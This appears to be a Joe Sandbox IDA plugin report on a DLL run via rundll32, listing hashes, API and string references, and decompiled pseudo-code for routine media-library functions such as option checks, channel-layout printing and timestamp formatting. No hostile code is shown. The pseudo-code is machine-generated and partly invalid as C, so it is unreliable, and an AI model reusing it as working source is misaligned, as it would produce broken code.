Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: strcmpstrncmpstrtol
String ID: AMBI
API String ID: 155133989-3084986980
Opcode ID: 96e8e9c81ed7be6940826c680e1056b1b9812cca35e7cd8c36495b4e89374ce8
Instruction ID: 080b42f47ecb1617c9eeb941eeb6b1a796e462e2a98a72bb2a37a4396a6a9be9
Opcode Fuzzy Hash: 96e8e9c81ed7be6940826c680e1056b1b9812cca35e7cd8c36495b4e89374ce8
Instruction Fuzzy Hash: 6A21BEB5A0C7858FF350CF2898C064FBAD0EB492D1F11893EF989C7355E235E8858B82

Uniqueness

Uniqueness Score: -1.00%

Function 1002D618 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 1002B8B0: strcmp.MSVCRT ref: 1002B8E8
Part of subcall function 1002B8B0: strcmp.MSVCRT ref: 1002B908

mv_log.F086 ref: 1002D6D0
mv_log.F086 ref: 1002D719

Strings

sample, xrefs: 1002D6AA, 1002D6E7
The value set by option '%s' is not a %s format, xrefs: 1002D6AF
Value %d for parameter '%s' out of %s format range [%d - %d], xrefs: 1002D6EC

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_logstrcmp
String ID: The value set by option '%s' is not a %s format$Value %d for parameter '%s' out of %s format range [%d - %d]$sample
API String ID: 3828882664-398100351
Opcode ID: 3e07b54a8c5b9266100eb8df6fed5a03186d0a9d5f030d572b3c63d664d80861
Instruction ID: 0c7f2e03ba38d81d1e1e0c9b6d1db8cf13c67e72c17d494c92790103fe4f9750
Opcode Fuzzy Hash: 3e07b54a8c5b9266100eb8df6fed5a03186d0a9d5f030d572b3c63d664d80861
Instruction Fuzzy Hash: F23106B49087458FC310EF28E49450ABBE1FB89250F818A6EE898A7350E735DC85CF82

Uniqueness

Uniqueness Score: -1.00%

Function 1002D510 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 70COMMON

Download Yara Rule

APIs

Part of subcall function 1002B8B0: strcmp.MSVCRT ref: 1002B8E8
Part of subcall function 1002B8B0: strcmp.MSVCRT ref: 1002B908

mv_log.F086 ref: 1002D5C0
mv_log.F086 ref: 1002D609

Strings

The value set by option '%s' is not a %s format, xrefs: 1002D59F
pixel, xrefs: 1002D59A, 1002D5D7
Value %d for parameter '%s' out of %s format range [%d - %d], xrefs: 1002D5DC

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_logstrcmp
String ID: The value set by option '%s' is not a %s format$Value %d for parameter '%s' out of %s format range [%d - %d]$pixel
API String ID: 3828882664-2904529261
Opcode ID: 6d67d68f37827fc2173720777fded49bdc184725d4fd87e091acf406c810f77d
Instruction ID: 234bf2112a1e99f4284ec0035f949f822d499b6bfe1808c76b51d9f3b31785bb
Opcode Fuzzy Hash: 6d67d68f37827fc2173720777fded49bdc184725d4fd87e091acf406c810f77d
Instruction Fuzzy Hash: 3B2127B4908B558FC300EF28E49050BB7F1FB89254F918A6FF89897350E671DC84CB82

Uniqueness

Uniqueness Score: -1.00%

Function 10012370 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 64stringCOMMON

Download Yara Rule

APIs

strftime.MSVCRT ref: 100123EF
mv_strlcatf.F086 ref: 10012429
mv_dict_set.F086 ref: 1001244D

Strings

.%06dZ, xrefs: 10012419
%Y-%m-%dT%H:%M:%S, xrefs: 100123D6

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_dict_setmv_strlcatfstrftime
String ID: %Y-%m-%dT%H:%M:%S$.%06dZ
API String ID: 3046200060-930656424
Opcode ID: 8265bdb7039045fb43de9663fc535b0ddd795e0ba8767e98d08ad63409ae019d
Instruction ID: 4200585820eefb0ad3589c066a71afa0f6c055d7c0249a28ce441d2d822c6705
Opcode Fuzzy Hash: 8265bdb7039045fb43de9663fc535b0ddd795e0ba8767e98d08ad63409ae019d
Instruction Fuzzy Hash: 3F21B0B5A093419FD350DF29E58069BBBE0FB88354F51C92EF89CC7301E638D8849B82

Uniqueness

Uniqueness Score: -1.00%

Function 1000D5CB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000D5CB(void* __edi) {
				void* _t75;

				while(1) {
					L3:
					__esi =  *(__edi + 4);
					__ebp = __ebp + 1;
					if(__esi <= __ebp) {
						break;
					} else {
						goto L4;
					}
					do {
						L4:
						if(__ebp >= __esi) {
							L42:
							__eax = 0x100b1acf;
							__esp[1] = 0x100b1acf;
							__eax = __esp[6];
							 *__esp = __esp[6];
							__eax = L100089C0();
							L9:
							__eax = __esp[6];
							__esi = "NONE";
							__esp[1] = "NONE";
							 *__esp = __esp[6];
							__eax = L100089C0();
							L10:
							if( *__edi != 2) {
								goto L3;
							}
							__edx =  *(__edi + 8);
							__eax = __ebp + __ebp * 2;
							__ecx = __edx + __eax * 8;
							if( *((char*)(__edx + 4 + __eax * 8)) == 0) {
								goto L3;
							}
							goto L12;
						}
						__eax =  *__edi;
						if(__eax == 2) {
							__edx =  *(__edi + 8);
							__eax = __ebp + __ebp * 2;
							__eax =  *(__edi + 8) + (__ebp + __ebp * 2) * 8;
							__ecx =  *( *(__edi + 8) + (__ebp + __ebp * 2) * 8);
							__ebx = __ecx - 0x400;
							if(__ebp != 0) {
								__esp[4] = __ecx;
								__eax = 0x100b1acf;
								__esp[1] = 0x100b1acf;
								__eax = __esp[6];
								 *__esp = __esp[6];
								__eax = L100089C0();
								__ecx = __esp[4];
							}
							if(__ebx > 0x3ff) {
								L38:
								if(__ecx <= 0x28) {
									L26:
									__eax =  *(0x100b2280 + __ecx * 8);
									if(__eax == 0) {
										L32:
										__esp[2] = __ecx;
										__eax = __esp[6];
										__ebx = "USR%d";
										__esp[1] = "USR%d";
										 *__esp = __esp[6];
										__eax = L100089C0();
										goto L10;
									}
									__esp[2] = __eax;
									__eax = "%s";
									__esp[1] = "%s";
									__eax = __esp[6];
									 *__esp = __esp[6];
									__eax = L100089C0();
									goto L10;
								}
								if(__ecx != 0xffffffff) {
									goto L32;
								}
								goto L9;
							}
							L36:
							__esp[2] = __ebx;
							__eax = "AMBI%d";
							__esp[1] = "AMBI%d";
							__eax = __esp[6];
							 *__esp = __esp[6];
							__eax = L100089C0();
							goto L10;
						}
						if(__eax == 3) {
							__eax =  *(__edi + 8);
							__edx =  *(__edi + 0xc);
							__esp[4] = __eax;
							__ebx = __eax;
							__ecx = __eax;
							__esp[5] =  *(__edi + 0xc);
							__eax >> 1 = __eax >> 0x00000001 & 0x55555555;
							__ecx = __eax - (__eax >> 0x00000001 & 0x55555555);
							__ebx = __ecx;
							__ecx = __ecx >> 2;
							__ebx = __ebx & 0x33333333;
							__ecx = __ecx & 0x33333333;
							__ecx =  &(__ecx[__ebx]);
							__ecx = __ecx >> 4;
							__ecx =  &(__ecx[__ecx >> 4]);
							__ecx = __ecx & 0x0f0f0f0f;
							__ebx =  &(__ecx[__ecx >> 8]);
							__ecx = __esp[5];
							__eax = __ebx;
							__ecx = __ecx >> 1;
							__ecx >> 1 = __ecx >> 0x00000001 & 0x55555555;
							__ecx = __ecx - (__ecx >> 0x00000001 & 0x55555555);
							__eax = __eax >> 0x10;
							__edx = __ecx;
							__ecx = __ecx >> 2;
							__edx = __edx & 0x33333333;
							__ecx = __ecx & 0x33333333;
							__ebx =  &(__eax[__eax >> 0x10]);
							__ecx =  &(__ecx[__edx]);
							__eax =  &(__eax[__eax >> 0x10]);
							__edx = __ecx;
							__eax = __eax & 0x0000003f;
							__edx = __ecx >> 4;
							__ecx =  &(__ecx[__ecx >> 4]);
							__ecx = __ecx & 0x0f0f0f0f;
							__ecx = __ecx >> 8;
							__ecx =  &(__ecx[__ecx >> 8]);
							__ecx = __ecx >> 0x10;
							__ebx =  &(__ecx[__ecx >> 0x10]);
							__ebx =  &(__ecx[__ecx >> 0x10]) & 0x0000003f;
							__ecx =  &(__eax[ &(__ecx[__ecx >> 0x10]) & 0x0000003f]);
							__ebx = __ebp;
							__esi = __esi - __ecx;
							__ebx = __ebp - __esi;
							if(__ebp >= __esi) {
								L17:
								__esp[7] = __ebp;
								__eax = __esp[4];
								__ecx = 0;
								__edx = __esp[5];
								__ebp = __edi;
								do {
									__edi = __edx;
									__esi = __eax;
									__esi = (__edi << 0x00000020 | __eax) >> __cl;
									__edi = __edi >> __cl;
									if((__cl & 0x00000020) != 0) {
										__esi = __edi;
									}
									__esi = __esi & 0x00000001;
									if(__esi == 0) {
										goto L19;
									}
									_t31 = __ebx - 1; // 0x0
									__esi = _t31;
									if(__ebx != 0) {
										__ebx = __esi;
										goto L19;
									}
									__edi = __ebp;
									__ebp = __esp[7];
									if(__ebp != 0) {
										__esp[4] = __ecx;
										__eax = 0x100b1acf;
										__esp[1] = 0x100b1acf;
										__eax = __esp[6];
										 *__esp = __esp[6];
										__eax = L100089C0();
										__ecx = __esp[4];
										goto L38;
									}
									if(__ecx > 0x28) {
										goto L32;
									}
									goto L26;
									L19:
									__ecx =  &(__ecx[1]);
								} while (__ecx != 0x40);
								__edi = __ebp;
								__ebp = __esp[7];
								if(__ebp == 0) {
									goto L9;
								}
								goto L42;
							}
							__ebx = 0;
							if(__ebp == 0) {
								goto L36;
							}
							__eax = 0x100b1acf;
							__ebx = __ebp;
							__esp[1] = 0x100b1acf;
							__eax = __esp[6];
							_t46 = __ebp + 0x400; // 0x401
							__ecx = _t46;
							__esp[4] = _t46;
							 *__esp = __esp[6];
							__eax = L100089C0();
							__ecx = __esp[4];
							if(__ebp <= 0x3ff) {
								goto L36;
							}
							goto L32;
						}
						if(__eax == 0) {
							__eax =  *(__edi + 8);
							__ebx = __ebp;
							__edx =  *(__edi + 0xc);
							__esp[4] =  *(__edi + 8);
							__esp[5] =  *(__edi + 0xc);
							goto L17;
						}
						if(__ebp != 0) {
							goto L42;
						}
						goto L9;
						L12:
						__eax = __esp[6];
						__ecx =  &(__ecx[4]);
						__ebp = __ebp + 1;
						__esp[2] = __ecx;
						__ecx = "@%s";
						__esp[1] = "@%s";
						 *__esp = __esp[6];
						__eax = L100089C0();
						__esi =  *(__edi + 4);
					} while (__esi > __ebp);
					break;
				}
				if(__esi == 0) {
					__eax = 0;
					__esp[2] = 0;
					__eax = "%d channels";
					__esp[1] = "%d channels";
					__eax = __esp[6];
					 *__esp = __esp[6];
					L100089C0() = 0;
				} else {
					__eax = __esp[6];
					__edx = 0x100b1ad1;
					__esp[1] = 0x100b1ad1;
					 *__esp = __esp[6];
					L100089C0() = 0;
				}
				return _t75;
			}

0x1000d5d0
0x1000d5d0
0x1000d5d0
0x1000d5d3
0x1000d5d6
0x00000000
0x00000000
0x00000000
0x00000000
0x1000d5dc
0x1000d5dc
0x1000d5de
0x1000d8be
0x1000d8be
0x1000d8c3
0x1000d8c7
0x1000d8cb
0x1000d8ce
0x1000d607
0x1000d607
0x1000d60b
0x1000d610
0x1000d614
0x1000d617
0x1000d620
0x1000d623
0x00000000
0x00000000
0x1000d625
0x1000d628
0x1000d631
0x1000d634
0x00000000
0x00000000
0x00000000
0x1000d634
0x1000d5e4
0x1000d5e9
0x1000d820
0x1000d823
0x1000d829
0x1000d82c
0x1000d82e
0x1000d834
0x1000d836
0x1000d83a
0x1000d83f
0x1000d843
0x1000d847
0x1000d84a
0x1000d84f
0x1000d84f
0x1000d859
0x1000d896
0x1000d899
0x1000d6f2
0x1000d6f2
0x1000d6fb
0x1000d800
0x1000d800
0x1000d804
0x1000d808
0x1000d80d
0x1000d811
0x1000d814
0x00000000
0x1000d814
0x1000d701
0x1000d705
0x1000d70a
0x1000d70e
0x1000d712
0x1000d715
0x00000000
0x1000d715
0x1000d8a2
0x00000000
0x00000000
0x00000000
0x1000d8a8
0x1000d85b
0x1000d85b
0x1000d85f
0x1000d864
0x1000d868
0x1000d86c
0x1000d86f
0x00000000
0x1000d86f
0x1000d5f2
0x1000d720
0x1000d723
0x1000d726
0x1000d72a
0x1000d72c
0x1000d72e
0x1000d734
0x1000d73a
0x1000d73c
0x1000d73e
0x1000d741
0x1000d747
0x1000d74d
0x1000d751
0x1000d754
0x1000d756
0x1000d761
0x1000d763
0x1000d767
0x1000d76b
0x1000d76f
0x1000d775
0x1000d779
0x1000d77c
0x1000d77e
0x1000d781
0x1000d787
0x1000d78d
0x1000d78f
0x1000d791
0x1000d793
0x1000d795
0x1000d798
0x1000d79b
0x1000d79d
0x1000d7a5
0x1000d7a8
0x1000d7ac
0x1000d7af
0x1000d7b1
0x1000d7b4
0x1000d7b7
0x1000d7b9
0x1000d7bb
0x1000d7bf
0x1000d698
0x1000d698
0x1000d69c
0x1000d6a0
0x1000d6a2
0x1000d6a6
0x1000d6bc
0x1000d6bc
0x1000d6be
0x1000d6c0
0x1000d6c3
0x1000d6c8
0x1000d6ca
0x1000d6ca
0x1000d6cc
0x1000d6d2
0x00000000
0x00000000
0x1000d6d4
0x1000d6d4
0x1000d6d9
0x1000d6b0
0x00000000
0x1000d6b0
0x1000d6db
0x1000d6dd
0x1000d6e3
0x1000d879
0x1000d87d
0x1000d882
0x1000d886
0x1000d88a
0x1000d88d
0x1000d892
0x00000000
0x1000d892
0x1000d6ec
0x00000000
0x00000000
0x00000000
0x1000d6b2
0x1000d6b2
0x1000d6b3
0x1000d8b0
0x1000d8b2
0x1000d8b8
0x00000000
0x00000000
0x00000000
0x1000d8b8
0x1000d7c5
0x1000d7c9
0x00000000
0x00000000
0x1000d7cf
0x1000d7d4
0x1000d7d6
0x1000d7da
0x1000d7de
0x1000d7de
0x1000d7e4
0x1000d7e8
0x1000d7eb
0x1000d7f6
0x1000d7fa
0x00000000
0x00000000
0x00000000
0x1000d7fa
0x1000d5f9
0x1000d688
0x1000d68b
0x1000d68d
0x1000d690
0x1000d694
0x00000000
0x1000d694
0x1000d601
0x00000000
0x00000000
0x00000000
0x1000d636
0x1000d636
0x1000d63a
0x1000d63d
0x1000d63e
0x1000d642
0x1000d647
0x1000d64b
0x1000d64e
0x1000d653
0x1000d656
0x00000000
0x1000d5dc
0x1000d662
0x1000d596
0x1000d8e3
0x1000d8e7
0x1000d8ec
0x1000d8f0
0x1000d8f4
0x1000d8fc
0x1000d668
0x1000d668
0x1000d66c
0x1000d671
0x1000d675
0x1000d67d
0x1000d67d
0x1000d57c

APIs

mv_bprintf.F086 ref: 1000D617
mv_bprintf.F086 ref: 1000D64E
mv_bprintf.F086 ref: 1000D678
mv_bprintf.F086 ref: 1000D715
mv_bprintf.F086 ref: 1000D7EB
mv_bprintf.F086 ref: 1000D814
mv_bprintf.F086 ref: 1000D84A
mv_bprintf.F086 ref: 1000D86F
mv_bprintf.F086 ref: 1000D8CE

Strings

@%s, xrefs: 1000D642
NONE, xrefs: 1000D60B

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_bprintf
String ID: @%s$NONE
API String ID: 3083893021-9228147
Opcode ID: 42121a472de4cb58ea8b3f161935e652dd00ef3bbb3abb2b6736c95388f2513a
Instruction ID: 7566f4ee250c6b1008f1cbc21f7ab5f057a1ffbd92fde749fdda637f05722331
Opcode Fuzzy Hash: 42121a472de4cb58ea8b3f161935e652dd00ef3bbb3abb2b6736c95388f2513a
Instruction Fuzzy Hash: 8C114C75909B1A8BE720EF18C58006EF7E1FB443D4F55891EE889A7219D731EC94CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 100194D1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 100194D8
mv_strerror.F086 ref: 100194FE

Part of subcall function 10013B30: mv_strlcpy.F086 ref: 10013B71

mv_log.F086 ref: 1001951B
_close.MSVCRT ref: 10019523

Strings

Error occurred in fstat(): %s, xrefs: 1001950B

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: _close_errnomv_logmv_strerrormv_strlcpy
String ID: Error occurred in fstat(): %s
API String ID: 1199337903-68092211
Opcode ID: fedef3c115d41d530a9bfdcd0bfafda126d4511fd0f21c34fa7b612a76f75a20
Instruction ID: dfd730866d5ba72d1ec682aa82f713c85e766a8eb03f77e440fb808261e44811
Opcode Fuzzy Hash: fedef3c115d41d530a9bfdcd0bfafda126d4511fd0f21c34fa7b612a76f75a20
Instruction Fuzzy Hash: A3F092B4819755DFC310DF14C48425EFBE4FF84700F51881EE5D997321DB78A9459B86

Uniqueness

Uniqueness Score: -1.00%

Function 10007100 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 114stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 10007126
strchr.MSVCRT ref: 1000715B
strncmp.MSVCRT ref: 10007200
strlen.MSVCRT ref: 1000724B

Strings

-, xrefs: 10007232

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: strlen$strchrstrncmp
String ID: -
API String ID: 2264528763-2547889144
Opcode ID: f0f04a066c244188fbca6ac71b0a1930aa93ce774d345eeea5f276fcbf092cf4
Instruction ID: 5f1f2dd0eab5bc6f8befd7c2bb33942bdc2d6399c7dfe7216c1ccb09edde324b
Opcode Fuzzy Hash: f0f04a066c244188fbca6ac71b0a1930aa93ce774d345eeea5f276fcbf092cf4
Instruction Fuzzy Hash: 6F318075A0C3558FEB50DA78949026EBBE1FF893C4F05492DF9C8D7245D278D9068B82

Uniqueness

Uniqueness Score: -1.00%

Function 1000A480 Relevance: 7.6, APIs: 5, Instructions: 83COMMON

Download Yara Rule

APIs

mv_mallocz.F086 ref: 1000A4BA
mv_freep.F086 ref: 1000A4E8
mv_freep.F086 ref: 1000A541

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_freep$mv_mallocz
String ID:
API String ID: 2455733640-0
Opcode ID: 57be5cbf1da16da54839bca519b4bd6de1be08dc8cda019c43820ae6256fb6b0
Instruction ID: 3b99154a913b274524c08becb6f728f5f8244ec0eeb4226c169e02ad570783d9
Opcode Fuzzy Hash: 57be5cbf1da16da54839bca519b4bd6de1be08dc8cda019c43820ae6256fb6b0
Instruction Fuzzy Hash: 1131B074908B01CFD760DF25C581A1AB7F0FF89391B568A5DEC999B319D730E881CB92

Uniqueness

Uniqueness Score: -1.00%

Function 10012049 Relevance: 7.6, APIs: 5, Instructions: 79
stringCOMMON

Download Yara Rule

C-Code - Quality: 20%

			E10012049(signed int __ebx, void* __ecx, void* __edx) {
				signed int* _t142;
				void* _t152;
				void* _t154;
				signed int* _t155;
				int _t157;
				signed int _t159;
				signed int _t165;
				int _t173;
				void* _t175;
				void* _t178;
				signed int _t179;
				void** _t180;
				void* _t183;
				signed int _t190;
				void** _t191;
				void* _t192;
				signed char _t195;
				void* _t208;
				void* _t210;
				void* _t212;
				void* _t213;
				void* _t214;
				void* _t215;
				void* _t217;
				signed int _t221;
				int _t223;
				void* _t224;
				void* _t230;
				void* _t232;
				int _t234;
				int _t236;
				void* _t237;
				void* _t239;
				void* _t241;
				signed int* _t243;
				void** _t246;

				_t210 = __edx;
				_t179 = __ebx;
				while(1) {
					L42:
					 *_t246 = _t192;
					_t246[0x19] = _t210;
					_t246[9] = _t192;
					_t236 = strlen(??);
					 *_t246 = _t246[8];
					_t173 = strlen(??);
					 *_t246 = _t246[9];
					_t223 = _t173;
					_t84 = _t173 + 1; // 0x1
					_t246[1] = _t236 + _t84;
					_t175 = L10028DA0();
					if(_t175 == 0) {
						break;
					}
					_t86 = _t223 + 1; // 0x1
					_t246[8] = _t86;
					_t214 = _t175 + _t236;
					_t237 = _t246[0xf];
					_t195 = _t214;
					_t246[0xb] = _t214;
					_t246[9] = _t214;
					_t215 = _t246[0x19];
					_t246[0xa] = _t237;
					if(_t246[8] >= 8) {
						if((_t195 & 0x00000001) != 0) {
							 *(_t246[0xb]) =  *_t237 & 0x000000ff;
							_t246[8] = _t223;
							_t246[9] = _t246[9] + 1;
							_t246[0xa] = _t246[0xa] + 1;
						}
						if((_t246[9] & 0x00000002) != 0) {
							_t239 = _t246[0xa];
							_t224 = _t246[9];
							 *_t224 =  *_t239 & 0x0000ffff;
							_t246[9] = _t224 + 2;
							_t246[8] = _t246[8] - 2;
							_t246[0xa] = _t239 + 2;
						}
						if((_t246[9] & 0x00000004) != 0) {
							_t241 = _t246[0xa];
							_t208 = _t246[9] + 4;
							 *(_t208 - 4) =  *_t241;
							_t246[9] = _t208;
							_t246[8] = _t246[8] - 4;
							_t246[0xa] = _t241 + 4;
						}
					}
					_t246[0x19] = _t215;
					_t246[0xb] = _t175;
					memcpy(_t246[9], _t246[0xa], _t246[8]);
					_t246 =  &(_t246[3]);
					 *_t246 =  &(_t246[0xf]);
					E100290E0();
					_t212 = _t246[0x19];
					_t246[0xf] = _t246[0xb];
					goto L18;
					while(1) {
						L19:
						_t234 = _t246[0xf];
						if(_t234 == 0) {
							goto L39;
						}
						L20:
						_t191 = _t190 + _t159 * 8;
						_t191[1] = _t234;
						 *_t191 = _t246[0xe];
						 *_t243 = _t159 + 1;
						while(1) {
							L21:
							_t179 = (_t180 -  *((intOrPtr*)(_t210 + 4)) >> 3) + 1;
							if( *_t210 <= _t179) {
								break;
							}
							_t180 =  *((intOrPtr*)(_t210 + 4)) + _t179 * 8;
							if(_t180 == 0) {
								break;
							} else {
								_t230 =  *_t180;
								_t246[0xe] = 0;
								_t217 = _t180[1];
								_t243 =  *(_t246[0x18]);
								_t246[0xf] = 0;
								if(_t246[5] == 0) {
									if(_t217 == 0) {
										goto L4;
									} else {
										 *_t246 = _t217;
										_t246[0x19] = _t210;
										_t178 = E100292E0(_t180, _t217, _t230, _t243);
										_t210 = _t246[0x19];
										_t246[0xf] = _t178;
										if(_t230 != 0) {
											goto L5;
										} else {
											goto L25;
										}
									}
								} else {
									_t246[0xf] = _t217;
									L4:
									if(_t230 == 0) {
										L25:
										_t142 = _t243;
										_t183 = 0xffffffea;
										goto L26;
									} else {
										L5:
										_t246[4] = 0;
										if(_t246[6] == 0) {
											_t246[1] = _t230;
											 *_t246 = _t243;
											_t246[0x19] = _t210;
											_t246[3] = _t246[0x1a];
											_t246[2] = 0;
											_t152 = E100110D0();
											_t210 = _t246[0x19];
											_t246[4] = _t152;
										}
										if(_t246[7] == 0) {
											 *_t246 = _t230;
											_t246[0x19] = _t210;
											_t154 = E100292E0(_t180, _t217, _t230, _t243);
											_t210 = _t246[0x19];
											_t246[0xe] = _t154;
											_t232 = _t154;
											if(_t243 == 0) {
												goto L33;
											} else {
